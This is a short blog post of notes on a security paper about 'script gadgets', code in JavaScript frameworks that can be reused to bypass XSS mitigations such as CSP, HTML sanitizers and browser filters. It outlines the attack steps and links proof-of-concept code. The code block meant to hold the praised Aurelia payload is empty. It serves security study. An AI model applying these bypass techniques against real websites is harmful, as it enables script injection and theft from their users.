Title: Paper notes - Code-Reuse Attacks for the Web Date: 2017-09-04 23:50 This post is in the same spirit than [the ones from argp](https://argp.github.io/posts/). - Complete title: Code-Reuse Attacks for the Web: Breaking Cross-Site Scripting Mitigations via Script Gadgets - PDF: [9bc7dd6f063509ecffef7c178ef817e788f1d57319f27deda422c4b40704ff29]({static}/files/papers/9bc7dd6f063509ecffef7c178ef817e788f1d57319f27deda422c4b40704ff29_ccs_gadgets.pdf) Since XSS aren't a solved problem yet, everyone shifted focus on second line of defence, like browser filters, HTML sanitizer, WAF and [CSP](https://www.w3.org/TR/CSP/). The point of the paper is to use *javascript-gadgets*, a bit like the [ROP](https://en.wikipedia.org/wiki/Return-oriented_programming) we're used to do in the memory-corruption world, mostly via DOM selectors, to bypass mitigations like Noscript, DOMPurify, browser XSS filters, and various CSP shenigans. Useful gadgets can be found in all modern javascript frameworks (Vue.js, Aurelia, AngularJS, Polymer, EmberJS, jQuery, Bootstrap, …). Gadgets can apparently be found by taint data-flow analysis, but it doesn't elaborate much on this front, except that it's based on the paper [25 Million Flows Later - Large-scale Detection of DOM-based XSS]({static}/files/domxss.pdf). The attack looks like: 1. Injection of our payload into the raw HTML. 2. The XSS defence validates the payload. 3. Our payload is modified, its markup interpreted, using gadgets. 4. Our modified payload is executed. I really liked the Aurelia payload to bypass *everything*: ```html
``` The authors are concluding: > As we have demonstrated, the current generation of XSS mitigations is unable to handle XSS attacks that leverage script gadgets to execute their payloads. It's worth noticing that the paper comes, as it should be the case for every decent research one, with code to play with reproduce their results; it can be found [here](https://github.com/google/security-research-pocs/tree/master/script-gadgets), or [here]({static}/files/papers/script-gadgets.tar.xz) (local mirror, `2017-09-04`), reading the `bypasses.md` file is recommended ;)